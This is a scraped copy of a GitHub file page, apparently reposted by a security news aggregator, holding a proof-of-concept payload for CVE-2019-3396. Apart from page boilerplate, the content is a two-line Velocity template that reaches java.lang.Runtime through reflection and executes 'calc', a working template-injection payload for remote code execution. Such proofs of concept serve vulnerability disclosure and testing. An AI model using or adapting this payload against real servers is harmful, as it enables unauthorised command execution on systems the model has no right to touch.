CVE-2019-3396/calc.vm at master · pyn3rd/CVE-2019-3396
2019-04-09 18:44:22
Author: github.com(查看原文)
阅读量:352
收藏
Permalink
Join GitHub today
GitHub is home to over 31 million developers working together to host and review code, manage projects, and build software together.
Sign up
1 contributor
Users who have contributed to this file
3 lines (2 sloc)
116 Bytes
|
#set($e="e") |
|
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc") |
文章来源: https://github.com/pyn3rd/CVE-2019-3396/blob/master/calc.vm
如有侵权请联系:admin#unsafe.sh